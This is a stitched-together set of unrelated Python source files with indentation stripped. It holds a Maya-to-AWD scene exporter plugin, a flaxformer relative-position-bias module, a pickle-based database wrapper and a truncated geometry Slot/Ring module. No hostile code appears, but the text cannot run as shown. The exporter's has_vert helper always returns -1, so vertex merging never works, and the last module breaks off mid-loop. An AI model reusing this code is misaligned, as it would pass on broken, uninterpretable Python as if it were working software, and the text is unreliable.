b_start = 0.0
def benchmark_start():
global b_start
b_start = time()
def benchmark_stop():
global b_start
dur = time() - b_start
b_start = 0.0
return dur
def benchmark_print():
dur = benchmark_stop()
print('Duration: %fs' % dur)
class MayaAWDFileTranslator(OpenMayaMPx.MPxFileTranslator):
def writer(self, file, options, mode):
file_path = file.resolvedFullName()
base_path = os.path.dirname(file_path)
opts = self.parse_opts(options)
def o(key, defval=None):
'Get option or default value'
if key in opts:
return opts[key]
else:
return defval
with open(file_path, 'wb') as file:
comp_str = o('compression', 'none')
compression = UNCOMPRESSED
if comp_str == 'deflate':
compression = DEFLATE
elif comp_str == 'lzma':
compression = LZMA
wide_mtx = int(o('wide_mtx', False))
wide_geom = int(o('wide_geom', False))
exporter = MayaAWDExporter(file, compression, wide_geom=wide_geom, wide_mtx=wide_mtx)
exporter.include_geom = bool(o('inc_geom', False))
exporter.include_scene = bool(o('inc_scene', False))
exporter.flatten_untransformed = bool(o('flatten_untransformed', False))
exporter.replace_exrefs = bool(o('replace_exrefs', False))
exporter.include_uvanim = bool(o('inc_uvanim', False))
exporter.include_skelanim = bool(o('inc_skelanim', False))
exporter.include_skeletons = bool(o('inc_skeletons', False))
exporter.include_materials = bool(o('inc_materials', False))
exporter.include_cameras = bool(o('inc_cams', False))
exporter.include_lights = bool(o('inc_lights', False))
exporter.embed_textures = bool(o('embed_textures', False))
exporter.alpha_blending = bool(o('alpha_blending', False))
exporter.alpha_threshold = float(o('alpha_threshold', 0.0))
exporter.include_attr = bool(o('inc_attr', False))
if exporter.include_attr:
exporter.user_ns = AWDNamespace(str(o('attrns', '')))
if exporter.include_skelanim:
exporter.animation_sequences = self.read_sequences(o('seqsrc'), base_path)
exporter.joints_per_vert = int(o('jointspervert', 3))
exporter.export(None)
# Copy viewer if preview should be created
create_preview = int(o('create_preview', 0))
if create_preview:
import shutil
import subprocess
pyawd_path = pyawd.__path__[0]
viewer_path = os.path.normpath(os.path.join(pyawd_path, '..', 'mayaawd'))
out_path = os.path.dirname(file_path)
out_name = os.path.basename(os.path.splitext(file_path)[0])
# Pick the right SWF file depending on desired sandbox model
prev_sandbox = int(o('preview_sandbox', 1))
if prev_sandbox == 1:
viewer_name = 'viewer_l.swf'
else:
viewer_name = 'viewer_n.swf'
shutil.copyfile(os.path.join(viewer_path, viewer_name), os.path.join(out_path, 'viewer.swf'))
shutil.copyfile(os.path.join(viewer_path, 'swfobject.js'), os.path.join(out_path, 'swfobject.js'))
html_template = os.path.join(viewer_path, 'template.html')
html_output = os.path.splitext(file_path)[0] + '.html'
# TODO: Fetch color from options
bg_color = '000000'
with open(html_template, 'r') as html_in:
with open(html_output, 'w') as html_out:
for line in html_in:
line = line.replace('%NAME%', out_name)
line = line.replace('%COLOR%', bg_color)
html_out.write(line)
try:
# Windows?
os.startfile(html_output)
except AttributeError:
# Mac OS X
subprocess.call(['open', html_output])
def defaultExtension(self):
return 'awd'
def haveWriteMethod(self):
return True
def parse_opts(self, opt_str):
if opt_str[0]==';':
opt_str=opt_str[1:]
fields = re.split('(?<!\\\)&', str(opt_str))
return dict([ re.split('(?<!\\\)=', pair) for pair in fields ])
def read_sequences(self, seq_path, base_path):
sequences = []
if seq_path is not None:
if not os.path.isabs(seq_path):
# Look for this file in a list of different locations,
# and use the first one in which it exists.
existed = False
bases = [
mc.workspace(q=True, rd=True),
os.path.join(mc.workspace(q=True, rd=True), mc.workspace('mayaAscii', q=True, fre=True)),
os.path.join(mc.workspace(q=True, rd=True), mc.workspace('AWD2', q=True, fre=True)),
base_path
]
for base in bases:
new_path = os.path.join(base, seq_path)
print('Looking for sequence file in %s' % new_path)
if os.path.exists(new_path) and os.path.isfile(new_path):
existed = True
seq_path = new_path
break
if not existed:
mc.warning('Could not find sequence file "%s. Will not export animation."' % seq_path)
return []
try:
with open(seq_path, 'r') as seqf:
lines = seqf.readlines()
for line in lines:
# Skip comments
if line[0] == '#':
continue
line_fields = re.split('[^a-zA-Z0-9]', line.strip())
sequences.append((line_fields[0], int(line_fields[1]), int(line_fields[2])))
except:
pass
return sequences
def ftCreator():
return OpenMayaMPx.asMPxPtr( MayaAWDFileTranslator() )
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject, 'Away3D', '1.0')
stat = mplugin.registerFileTranslator('AWD2', 'none', ftCreator, 'MayaAWDExporterUI')
return stat
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
stat = mplugin.deregisterFileTranslator('AWD2')
return stat
class MayaAWDBlockCache:
'''A cache of already created AWD blocks, and their connection to
nodes in the Maya DAG. The cache should always be checked before
creating a blocks, so that blocks can be reused within the file
when possible.'''
def __init__(self):
self.__cache = []
def get(self, path):
block = None
for item in self.__cache:
if item[0] == path:
block = item[1]
break
return block
def add(self, path, block):
if self.get(path) is None:
self.__cache.append((path, block))
class MayaAWDExporter:
def __init__(self, file, compression, wide_geom=False, wide_mtx=False):
self.file = file
self.block_cache = MayaAWDBlockCache()
self.skeleton_paths = []
self.joint_indices = {}
self.mesh_vert_indices = {}
self.include_attr = False
self.include_geom = False
self.include_scene = False
self.flatten_untransformed = False
self.replace_exrefs = False
self.include_uvanim = False
self.include_skelanim = False
self.include_skeletons = False
self.include_materials = False
self.include_cameras = False
self.include_lights = False
self.embed_textures = False
self.animation_sequences = []
self.has_skelanim = False
self.awd = AWD(compression=compression, wide_geom=wide_geom, wide_mtx=wide_mtx)
def export(self, selection):
# Assume that bind pose is on frame 1
om.MGlobal.viewFrame(0)
self.export_scene()
if self.include_skeletons:
self.export_skeletons()
if self.include_skelanim and self.has_skelanim:
self.export_animation(self.animation_sequences)
self.awd.flush(self.file)
def export_scene(self):
dag_it = om.MItDag(om.MItDag.kDepthFirst)
while not dag_it.isDone():
visible = False
try:
attr0 = '%s.visibility' % dag_it.partialPathName()
attr1 = '%s.ovv' % dag_it.partialPathName()
visible = mc.getAttr(attr0) and mc.getAttr(attr1)
except:
pass
if visible:
if dag_it.currentItem().hasFn(om.MFn.kTransform):
transform = dag_it.fullPathName()
print('')
print('================================================')
print('export %s' % dag_it.fullPathName())
print('================================================')
def find_nearest_cached_ancestor(child_dag_fn):
if child_dag_fn.parentCount() > 0:
parent_dag_fn = om.MFnDagNode(child_dag_fn.parent(0))
print('looking in cache for "%s"' % parent_dag_fn.fullPathName())
awd_parent = self.block_cache.get(parent_dag_fn.fullPathName())
if awd_parent is not None:
return awd_parent
else:
return find_nearest_cached_ancestor(parent_dag_fn)
else:
return None
dag_fn = om.MFnDagNode(dag_it.currentItem())
awd_parent = find_nearest_cached_ancestor(dag_fn)
shapes = mc.listRelatives(transform, s=True, f=True)
if shapes is not None:
shape = shapes[0]
api_type = mc.nodeType(shape, api=True)
if api_type == 'kMesh':
self.export_mesh(transform, shape, awd_parent)
elif api_type == 'kCamera' and self.include_cameras:
# Cameras for some reason are "shapes" in Maya
self.export_camera(transform, awd_parent)
elif not dag_it.currentItem().hasFn(om.MFn.kJoint):
# Container!
mtx = mc.xform(transform, q=True, m=True)
#Skip this container if untransformed and transformation is identity
id_mtx = [1,0,0,0, 0,1,0,0, 0,0,1,0, 0,0,0,1]
if not (self.flatten_untransformed and mtx == id_mtx):
ctr = AWDContainer(name=dag_it.partialPathName(), transform=self.mtx_list2awd(mtx))
print('saving in cache with id %s' % transform)
self.block_cache.add(transform, ctr)
if awd_parent is not None:
awd_parent.add_child(ctr)
else:
self.awd.add_scene_block(ctr)
self.set_attributes(transform, ctr)
else:
if dag_it.fullPathName(): # Not root
# Stop iterating this branch of the tree
dag_it.prune()
print('skipping invisible %s' % dag_it.fullPathName())
dag_it.next()
def export_camera(self, transform, awd_parent):
mtx = mc.xform(transform, q=True, m=True)
cam = AWDCamera(self.get_name(transform), AWDMatrix3x4(mtx))
cam.type = CAM_FREE
cam.lens = LENS_PERSPECTIVE
cam.fov = mc.camera(transform, q=True, vfv=True)
if awd_parent is not None:
awd_parent.add_child(cam)
else:
self.awd.add_scene_block(cam)
def export_skeletons(self):
dag_it = om.MItDependencyNodes(om.MFn.kSkinClusterFilter)
while not dag_it.isDone():
obj = dag_it.thisNode()
joints = om.MDagPathArray()
skin_fn = omanim.MFnSkinCluster(obj)
num_joints = skin_fn.influenceObjects(joints)
# Loop through joints and look in block cache whether
# a skeleton for this joint has been exported. If not,
# we will ignore this binding altogether.
skel = None
#print('found skin cluster for %s!' % skel)
for i in range(num_joints):
#print('affected joint: %s' % joints[i].fullPathName())
skel = self.block_cache.get(self.get_skeleton_root(joints[i].fullPathName()))
if skel is not None:
break
# Skeleton was found
if skel is not None:
#print('found skeleton in cache!')
#print('num joints: %d' % num_joints)
# Loop through meshes that are influenced by this
# skeleton, and add weight stream to their mesh data
num_geoms = skin_fn.numOutputConnections()
#print('num geoms: %d' % num_geoms)
for i in range(num_geoms):
skin_path = om.MDagPath()
skin_fn.getPathAtIndex(i, skin_path)
vert_it = om.MItMeshVertex(skin_path)
#print('skin obj: %s' % skin_path.fullPathName())
# Check whether a mesh data for this geometry has
# been added to the block cache. If not, bindings
# for this mesh can be ignored.
md = self.block_cache.get(self.get_name(skin_path.fullPathName()))
if md is not None:
#print('found mesh in cache!')
weight_data = []
index_data = []
self.has_skelanim = True
while not vert_it.isDone():
comp = vert_it.currentItem()
weights = om.MDoubleArray()
weight_objs = []
#script_util = om.MScriptUtil()
for ii in range(num_joints):
skin_fn.getWeights(skin_path, comp, ii, weights)
joint_name = joints[ii].fullPathName()
joint_idx = self.joint_indices[joint_name.split('|')[-1]]
weight_objs.append( (joint_idx, weights[0]) )
def comp_weight_objs(wo0, wo1):
if wo0[1] > wo1[1]: return -1
else: return 1
weight_objs.sort(comp_weight_objs)
# Normalize top weights
weight_objs = weight_objs[0:self.joints_per_vert]
sum_obj = reduce(lambda w0,w1: (0, w0[1]+w1[1]), weight_objs)
if sum_obj[1] > 0.0:
weight_objs = map(lambda w: (w[0], w[1] / sum_obj[1]), weight_objs)
# Add more empty weight objects if too few
if len(weight_objs) != self.joints_per_vert:
weight_objs.extend([(0,0)] * (self.joints_per_vert - len(weight_objs)))
for w_obj in weight_objs:
index_data.append(w_obj[0])
weight_data.append(w_obj[1])
vert_it.next()
weight_stream = []
index_stream = []
# This list contains the old-index of each vertex in the AWD vertex stream
vert_indices = self.mesh_vert_indices[skin_path.fullPathName()]
for idx in vert_indices:
start_idx = idx*self.joints_per_vert
end_idx = start_idx + self.joints_per_vert
w_tuple = weight_data[start_idx:end_idx]
i_tuple = index_data[start_idx:end_idx]
weight_stream.extend(w_tuple)
index_stream.extend(i_tuple)
if len(md) == 1:
print('Setting streams!')
sub = md[0]
sub.add_stream(pyawd.geom.STR_JOINT_WEIGHTS, weight_stream)
sub.add_stream(pyawd.geom.STR_JOINT_INDICES, index_stream)
else:
print('skinning not implemented for meshes with <> 1 sub-mesh')
dag_it.next()
def export_animation(self, sequences):
#TODO: Don't hard-code these.
#animated_materials = [ 'MAT_BlueEye_L', 'MAT_BlueEye_R' ]
#animated_materials = [ 'MAT_BrownEye_L', 'MAT_BrownEye_R' ]
animated_materials = []
for seq in sequences:
frame_idx = seq[1]
end_frame = seq[2]
print('exporting sequence "%s" (%d-%d)' % seq)
if len(self.skeleton_paths) > 0:
anim = AWDSkeletonAnimation(seq[0])
self.awd.add_skeleton_anim(anim)
uvanims = []
for mat in animated_materials:
uvanim = AWDUVAnimation(mat.replace('MAT', 'UVANIM')+'_'+seq[0])
uvanims.append(uvanim)
self.awd.add_uv_anim(uvanim)
while frame_idx <= end_frame:
om.MGlobal.viewFrame(frame_idx)
self.sample_materials(animated_materials, uvanims)
for skeleton_path in self.skeleton_paths:
def get_all_transforms(joint_path, list):
mtx_list = mc.xform(joint_path, q=True, m=True)
list.append( self.mtx_list2awd(mtx_list))
children = mc.listRelatives(joint_path, type='joint')
if children is not None:
for child in children:
get_all_transforms(child, list)
skel_pose = AWDSkeletonPose()
all_transforms = []
get_all_transforms(skeleton_path, all_transforms)
for tf in all_transforms:
skel_pose.add_joint_transform(tf)
#TODO: Don't hard-code duration
anim.add_frame(skel_pose, 40)
self.awd.add_skeleton_pose(skel_pose)
# Move to next frame
frame_idx += 1
def export_mesh(self, transform, shape, awd_ctr):
try:
mtx = mc.xform(transform, q=True, m=True)
except:
print('skipping invalid %s' % transform)
tf_name = self.get_name(transform)
sh_name = self.get_name(shape)
tf_is_ref = mc.referenceQuery(transform, inr=True)
sh_is_ref = mc.referenceQuery(shape, inr=True)
if (tf_is_ref or sh_is_ref) and self.replace_exrefs:
# This is an external reference, and it should be
# replaced with an empty container in the AWD file
ctr = AWDContainer(name=tf_name, transform=AWDMatrix3x4(mtx))
self.set_attributes(transform, ctr)
self.block_cache.add(transform, ctr)
if awd_ctr is not None:
awd_ctr.add_child(ctr)
else:
self.awd.add_scene_block(ctr)
else:
md = self.block_cache.get(sh_name)
if md is None:
print('Creating mesh data %s' % sh_name)
md = AWDTriGeom(sh_name)
md.bind_matrix = AWDMatrix3x4(mtx)
self.export_mesh_data(md, shape)
self.awd.add_tri_geom(md)
self.block_cache.add(sh_name, md)
inst = AWDMeshInst(md, tf_name, self.mtx_list2awd(mtx))
self.set_attributes(transform, inst)
# Look for materials
if self.include_materials:
self.export_materials(transform, inst)
self.block_cache.add(transform, inst)
if awd_ctr is not None:
awd_ctr.add_child(inst)
else:
self.awd.add_scene_block(inst)
if self.include_skeletons:
history = mc.listHistory(transform)
clusters = mc.ls(history, type='skinCluster')
if len(clusters) > 0:
#TODO: Deal with multiple clusters?
sc = clusters[0]
influences = mc.skinCluster(sc, q=True, inf=True)
if len(influences) > 0:
skel_path = self.get_skeleton_root(influences[0])
if self.block_cache.get(skel_path) is None:
self.export_skeleton(skel_path)
def export_materials(self, transform, awd_inst):
sets = mc.listSets(object=transform, t=1, ets=True)
if sets is not None:
for set in sets:
if mc.nodeType(set)=='shadingEngine':
tex = None
mat = None
mat_his = mc.listHistory(set)
for state in mat_his:
state_type = mc.nodeType(state)
if state_type == 'lambert':
mat = self.block_cache.get(state)
if mat is None:
mat = AWDMaterial(AWDMaterial.BITMAP, name=self.get_name(state))
self.awd.add_material(mat)
self.block_cache.add(state, mat)
print('created material')
if self.alpha_blending or self.alpha_threshold > 0.0:
# Check if transparency is an input (rather than scalars)
# in which case the material needs to be marked as transparent,
# to indicate that the texture's alpha channel should be used.
tr_input = mc.connectionInfo('%s.it' % state, isDestination=True)
if tr_input:
if self.alpha_threshold > 0.0:
mat.alpha_threshold = self.alpha_threshold
else:
mat.alpha_blending = True
awd_inst.materials.append(mat)
print('adding material ' + state)
# Only check the first file, which will likely be the color input.
# TODO: This needs to be solved in a prettier way for normal maps
# and other inputs like that.
elif state_type == 'file' and tex is None:
tex = self.block_cache.get(state)
if tex is None:
tex_abs_path = str(mc.getAttr(state+'.fileTextureName'))
if self.embed_textures:
tex = AWDBitmapTexture(AWDBitmapTexture.EMBED, name=self.get_name(state))
tex.embed_file(tex_abs_path)
print('embedding %s' % tex_abs_path)
else:
tex = AWDBitmapTexture(AWDBitmapTexture.EXTERNAL, name=self.get_name(state))
tex.url = mc.workspace(pp=tex_abs_path)
self.awd.add_texture(tex)
self.block_cache.add(state, tex)
print('created texture')
if mat is not None:
mat.texture = tex
elif state_type == 'place2dTexture' and mat is not None:
# Determine from place2dTexture node whether
# this material should repeat/wrap
rep_uv = mc.getAttr('%s.re' % state)[0]
if rep_uv[0] != 1.0 or rep_uv[1] != 1.0:
mat.repeat = True
elif mc.getAttr(state+'.wu') or mc.getAttr(state+'.wv'):
mat.repeat = True
def sample_materials(self, animated_materials, uvanims):
idx = 0
for mat in animated_materials:
pt = None
mat_his = mc.listHistory(mat)
#print('sampling mat', mat)
uvanim = uvanims[idx]
# Find most recent place2DTexture
for state in mat_his:
if mc.nodeType(state) == 'place2dTexture':
pt = state
break
t = mc.getAttr(pt+'.tf')[0]
#TODO: Don't hard-code duration
uvanim.add_frame( AWDMatrix2x3([ 1, 0, 0, 1, -t[0], t[1] ]), 40)
idx += 1
def export_skeleton(self, root_path):
skel = AWDSkeleton(name=root_path)
joints = []
def create_joint(joint_path, world_mtx=None):
dag_path = self.get_dag_from_path(joint_path)
tf_fn = om.MFnTransform(dag_path.node())
tf = tf_fn.transformation()
joint_wm = tf.asMatrix()
if world_mtx is not None:
joint_wm = joint_wm * world_mtx
ibm = joint_wm.inverse()
awd_mtx = self.mtx_maya2awd(ibm)
name = self.get_name(joint_path)
joint = AWDSkeletonJoint(name=name, inv_bind_mtx=awd_mtx)
self.joint_indices[joint_path] = len(joints)
print('added joint %s as idx %d' % (joint_path, len(joints)))
joints.append(name)
children = mc.listRelatives(joint_path, type='joint')
print('JOINT CHILDREN: %s', str(children))
if children is not None:
for child_path in children:
joint.add_child_joint( create_joint(child_path, joint_wm) )
return joint
skel.root_joint = create_joint(root_path)
self.awd.add_skeleton(skel)
self.block_cache.add(root_path, skel)
self.skeleton_paths.append(root_path)
def get_skeleton_root(self, joint_path):
current = joint_path
parent = mc.listRelatives(current, p=True)
while parent:
current = parent
parent = mc.listRelatives(current, p=True)
if isinstance(current, list):
current = current[0]
return str(current)
def get_dag_from_path(self, path):
list = om.MSelectionList()
list.add(path)
dag_path = om.MDagPath()
list.getDagPath(0, dag_path, om.MObject())
return dag_path
def export_mesh_data(self, md, shape_path):
dag_path = self.get_dag_from_path(shape_path)
if dag_path.hasFn(om.MFn.kMesh):
exp_vert_list = []
def get_uvs(vert_it, face_idx):
us = om.MFloatArray()
vs = om.MFloatArray()
uvis = om.MIntArray()
# TODO: Deal with this failing (missing UVs)
vert_it.getUVs(us, vs, uvis)
for i in range(len(uvis)):
if uvis[i] == face_idx:
return (us[i],vs[i])
print('NO UV FOUND!!!!! WHY!!!!!??')
return (0,0)
def get_vnormal(shape, vert_itx, face_idx):
vec = om.MVector()
attr = '%s.vtxFace[%d][%d]' % (shape, vert_itx, face_idx)
vec = mc.polyNormalPerVertex(attr, q=True, xyz=True)
return vec
benchmark_start()
print('getting mesh data for %s' % dag_path.fullPathName())
print('type: %s' % dag_path.node().apiTypeStr())
vert_it = om.MItMeshVertex(dag_path.node())
poly_it = om.MItMeshPolygon(dag_path.node())
while not poly_it.isDone():
tri_inds = om.MIntArray()
tri_points = om.MPointArray()
poly_index = poly_it.index()
idx_triple = []
poly_it.getTriangles(tri_points, tri_inds)
for i in range(tri_inds.length()):
vert_index = tri_inds[i]
pidx_util = om.MScriptUtil()
vert_it.setIndex(vert_index, pidx_util.asIntPtr())
u,v = get_uvs(vert_it, poly_index)
normal = get_vnormal(shape_path, vert_index, poly_index)
pos = vert_it.position()
exp_vert_list.append(
[ vert_index, poly_index, pos[0], pos[1], pos[2], u, v, normal[0], normal[1], normal[2] ])
poly_it.next()
print('- Raw (expanded) data list created')
benchmark_print()
# Store this so binding (joint index) data can be
# put into the right place of the new vertex list
vert_indices = []
self.mesh_vert_indices[dag_path.fullPathName()] = vert_indices
vertices = []
indices = []
uvs = []
normals = []
exp_vert_inds = {}
def has_vert(haystack, needle):
idx = 0
if needle[0] in exp_vert_inds:
for v_idx in exp_vert_inds[needle[0]]:
v = haystack[v_idx]
correct = True
for prop in range(2, 10):
if needle[prop] != v[prop]:
correct = False
break
idx += 1
return -1
merged_vertices = []
print('- Creating condensed list')
benchmark_start()
for v in exp_vert_list:
idx = has_vert(merged_vertices, v)
if idx >= 0:
# Already has vertex
indices.append(idx)
else:
# Store this for binding data
vert_indices.append(v[0])
# This vertex will be added into the expanded list of vertices,
# which can get very large. To enable fast look-up, we map it's
# original index to that in the expanded list
vert_index = v[0]
if vert_index not in exp_vert_inds:
exp_vert_inds[vert_index] = []
exp_vert_inds[vert_index].append(len(merged_vertices))
indices.append(len(merged_vertices))
merged_vertices.append(v)
for v in merged_vertices:
# Add vertex and index
vertices.append(v[2]) # X
vertices.append(v[3]) # Y
vertices.append(-v[4]) # Z (inverted)
uvs.append(v[5]) # U
uvs.append(1-v[6]) # V
normals.append(v[7]) # Normal X
normals.append(v[8]) # Normal Y
normals.append(-v[9]) # Normal Z (inverted)
benchmark_print()
print('- DONE! Flipping windings')
benchmark_start()
# Flip windings
for idx in range(1, len(indices), 3):
tmp = indices[idx]
indices[idx] = indices[idx+1]
indices[idx+1] = tmp
benchmark_print()
print('- Creating sub-mesh')
sub = AWDSubGeom()
sub.add_stream(pyawd.geom.STR_VERTICES, vertices)
sub.add_stream(pyawd.geom.STR_TRIANGLES, indices)
sub.add_stream(pyawd.geom.STR_UVS, uvs)
sub.add_stream(pyawd.geom.STR_VERTEX_NORMALS, normals)
print('- Adding sub-mesh')
md.add_sub_geom(sub)
# Store mesh data block to block cache
def set_attributes(self, dag_path, awd_elem):
if self.include_attr:
extra_attributes = mc.listAttr(dag_path, ud=True)
if extra_attributes is not None:
for attr in extra_attributes:
val = mc.getAttr('%s.%s' % (dag_path, attr))
awd_elem.attributes[self.user_ns][str(attr)] = val
def get_name(self, dag_path):
# TODO: Deal with unicode names. In pyawd?
return str(dag_path.split('|')[-1])
def mtx_list2awd(self, mtx):
mtx_list = [1,0,0,0,1,0,0,0,1,0,0,0]
mtx_list[0] = mtx[0]
mtx_list[1] = mtx[1]
mtx_list[2] = -mtx[2]
mtx_list[3] = mtx[4]
mtx_list[4] = mtx[5]
mtx_list[5] = -mtx[6]
mtx_list[6] = -mtx[8]
mtx_list[7] = -mtx[9]
mtx_list[8] = mtx[10]
mtx_list[9] = mtx[12]
mtx_list[10] = mtx[13]
mtx_list[11] = -mtx[14]
return AWDMatrix3x4(mtx_list)
def mtx_maya2awd(self, mtx):
mtx_list = []
for i in range(16):
row_idx = math.floor(i/4)
col_idx = i%4
mtx_list.append(mtx(int(row_idx), int(col_idx)))
#mtx_list[1] *= -1
#mtx_list[2] *= -1
#mtx_list[3] *= -1
#mtx_list[4] *= -1
#mtx_list[8] *= -1
#print(mtx_list[0:4])
#print(mtx_list[4:8])
#print(mtx_list[8:12])
#print(mtx_list[12:])
return self.mtx_list2awd(mtx_list)
|
# Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for relative position biases generalized to long inputs."""
from typing import Any, Callable
from flax import linen as nn
from flax.linen import partitioning
from jax import lax
import jax.numpy as jnp
import numpy as np
from flaxformer.types import Array
class RelativePositionBiasesGeneral(nn.Module):
"""Adds T5-style relative positional embeddings to the attention logits.
This generalizes the original `RelativePositionBiases` implementation to
accept an `rp_bucket` input of any shape, avoiding construction of
an O(N^2) tensor for long inputs of length N. The original full attention
`rp_bucket` can be retrieved with `full_att_rp_bucket()`.
T5 uses a form of relative attention which biases the attention matrix, so
each head effectively attends to things at different scales, irrespective of
the contents of keys and queries.
In the future, this class may be unified with classes which take into account
key and query contents, like the original relative position embeddings of Shaw
et al. and new proposals. However, this will rely on XLA to recover efficiency
for this class (especially when, as in the original T5, the same bias matrix
is shared for all layers).
Attributes:
num_buckets: Number of buckets to bucket distances between key and query
positions into.
max_distance: Maximum distance before everything is lumped into the last
distance bucket.
num_heads: Number of heads in the attention layer. Each head will get a
different relative position weighting.
dtype: Type of arrays through this module.
embedding_init: initializer for relative embedding table.
"""
num_buckets: int
max_distance: int
num_heads: int
dtype: Any
embedding_init: Callable[..., Array] = nn.linear.default_embed_init
@staticmethod
def relative_position_bucket(relative_position,
bidirectional=True,
num_buckets=32,
max_distance=128):
"""Translates relative position to a bucket number for relative attention.
The relative position is defined as memory_position - query_position, i.e.
the distance in tokens from the attending position to the attended-to
position. If bidirectional=False, then positive relative positions are
invalid.
We use smaller buckets for small absolute relative_position and larger
buckets for larger absolute relative_positions. All relative
positions >=max_distance map to the same bucket. All relative
positions <=-max_distance map to the same bucket. This should allow for
more graceful generalization to longer sequences than the model has been
trained on.
Args:
relative_position: an int32 array
bidirectional: a boolean - whether the attention is bidirectional
num_buckets: an integer
max_distance: an integer
Returns:
a Tensor with the same shape as relative_position, containing int32
values in the range [0, num_buckets)
"""
ret = 0
n = -relative_position
if bidirectional:
num_buckets //= 2
ret += (n < 0).astype(jnp.int32) * num_buckets
n = jnp.abs(n)
else:
n = jnp.maximum(n, 0)
# now n is in the range [0, inf)
max_exact = num_buckets // 2
is_small = (n < max_exact)
val_if_large = max_exact + (
jnp.log(n.astype(jnp.float32) / max_exact + jnp.finfo(jnp.float32).eps)
/ jnp.log(max_distance / max_exact) *
(num_buckets - max_exact)).astype(jnp.int32)
val_if_large = jnp.minimum(val_if_large, num_buckets - 1)
ret += jnp.where(is_small, n, val_if_large)
return ret
def full_att_rp_bucket(self, qlen, klen, bidirectional=True):
"""Gets relative position buckets for full attention.
Args:
qlen: attention query length.
klen: attention key length.
bidirectional: a boolean - whether the attention is bidirectional
Returns:
int32 (qlen, klen) shaped array containing values in the range
[0, num_buckets).
"""
# TODO: should we be computing this w. numpy as a program
# constant?
context_position = np.arange(qlen, dtype=jnp.int32)[:, None]
memory_position = np.arange(klen, dtype=jnp.int32)[None, :]
relative_position = memory_position - context_position # shape (qlen, klen)
rp_bucket = self.relative_position_bucket(
relative_position,
bidirectional=bidirectional,
num_buckets=self.num_buckets,
max_distance=self.max_distance)
return rp_bucket
@nn.compact
def __call__(self, rp_bucket: Array):
"""Produces relative position embedding attention biases.
Args:
rp_bucket: int32 containing values in the range [0, num_buckets). In the
full attention case, this should have shape (qlen, klen).
Returns:
output: Attention bias array with shape `(1, num_heads) + rp_bucket.shape`
"""
relative_attention_bias = partitioning.param_with_axes(
'rel_embedding',
self.embedding_init, (self.num_heads, self.num_buckets),
jnp.float32,
axes=('heads', 'relpos_buckets'))
relative_attention_bias = jnp.asarray(relative_attention_bias, self.dtype)
# Instead of using a slow gather, we create a leading-dimension one-hot
# array from rp_bucket and use it to perform the gather-equivalent via a
# contraction. For example, if `rp_bucket` has shape (qlen, klen), the
# contraction looks like:
# (num_head, num_buckets) x (num_buckets one-hot, qlen, klen).
# This is equivalent to relative_attention_bias[:, rp_bucket]
bcast_iota_shape = [self.num_buckets] + [1] * rp_bucket.ndim
bcast_iota = lax.broadcasted_iota(jnp.int32, bcast_iota_shape, 0)
rp_bucket_one_hot = jnp.array(
rp_bucket[jnp.newaxis, ...] == bcast_iota, dtype=self.dtype)
# --> shape (num_heads, rp_bucket.shape)
values = lax.dot_general(
relative_attention_bias,
rp_bucket_one_hot,
(
((1,), (0,)), # lhs, rhs contracting dims
((), ()))) # no batched dims
# Add a singleton batch dimension.
# --> shape (1, num_heads, rp_bucket.shape)
return values[jnp.newaxis, ...]
|
"""Module with abstraction for databases and tables."""
import os
import pandas as pd
from glob import glob
from typing import List, Optional
from cgnal.core.typing import PathLike
from cgnal.core.utils.fs import create_dir_if_not_exists
from cgnal.core.data.layer import DatabaseABC, TableABC
from cgnal.core.logging.defaults import WithLogging
class Database(WithLogging, DatabaseABC):
"""Class representing a Database object."""
def __init__(self, name: PathLike, extension: str = ".p") -> None:
"""
Return an instance of a class implementing standard read and write methods to pickle data sources.
:param name: path to pickles
:param extension: standard pickle extension
"""
if not os.path.exists(name):
self.logger.info(f"Creating new database {name}")
self.name = create_dir_if_not_exists(name)
self.extension = extension
@property
def tables(self) -> List[str]:
"""
Complete pickle names with appropriate extension.
:return: pickle names with appropriate extensions
"""
return list(
map(
lambda x: os.path.basename(x)[: -len(self.extension)],
glob(os.path.join(self.name, "*%s" % self.extension)),
)
)
def __getitem__(self, table_name: str) -> "Table":
"""
Return table from the database.
:param table_name: Name of the table
:return: object of class PickleTable
"""
return self.table(table_name)
def table(self, table_name: str) -> "Table":
"""
Select table.
:param table_name: name of the table
:return: object of class PickleTable
"""
if table_name in self.tables:
return Table(self, table_name)
else:
self.logger.warning(f"Table {table_name} not found in database {self.name}")
return Table(self, table_name)
class Table(WithLogging, TableABC):
"""Class representing a Table in a Database."""
def __init__(self, db: Database, table_name: str) -> None:
"""
Implement a constructor for tables using pickle file format.
:param db: database to which the table belongs
:param table_name: name of the table
"""
if not isinstance(db, Database):
raise ValueError(
f"The db should an instance of {'.'.join([Database.__module__, Database.__name__])}"
)
self.db = db
self.name = table_name
@property
def filename(self) -> PathLike:
"""
Return path to pickle.
:return: path to pickle file
"""
return os.path.join(self.db.name, "%s.p" % self.name)
def to_df(self, query: Optional[str] = None) -> pd.DataFrame:
"""
Read pickle.
:return: pd.DataFrame or pd.Series read from pickle
"""
df = pd.read_pickle(self.filename)
return df if query is None else df.query(query)
@property
def data(self) -> pd.DataFrame:
"""
Read pickle.
:return: pd.DataFrame or pd.Series read from pickle
"""
return pd.read_pickle(self.filename)
def write(self, df: pd.DataFrame, overwrite: bool = False) -> None:
"""
Write pickle of data, eventually outer joined with an input DataFrame.
:param df: input data
:param overwrite: whether or not to overwrite existing file
:return: None
"""
# self.data can fail with:
# - KeyError if it tries to read a non-pickle file
# - IOError if the file does not exist
try:
_in = [self.to_df()] if not overwrite else []
except (KeyError, IOError):
_in = []
# pd.concat can fail with a TypeError if df is not an NDFrame object
try:
_df = pd.concat(_in + [df])
except TypeError:
_df = df
_df.to_pickle(self.filename)
|
import math
import json
class Slot:
def __init__(self, x, y, size, color=None):
self.x = x
self.y = y
self.size = size
self.color = color
def data(self):
return {'x': int(self.x),
'y': int(self.y),
'size': int(self.size),
'color': self.color}
class Ring:
def __init__(self, x, y, rad, size, count):
self.x = x
self.y = y
self.slots = []
step = (2 * math.pi) / count
r = 0
for i in range(0, count):
xx = math.sin(r) * rad
yy = math.cos(r) * rad
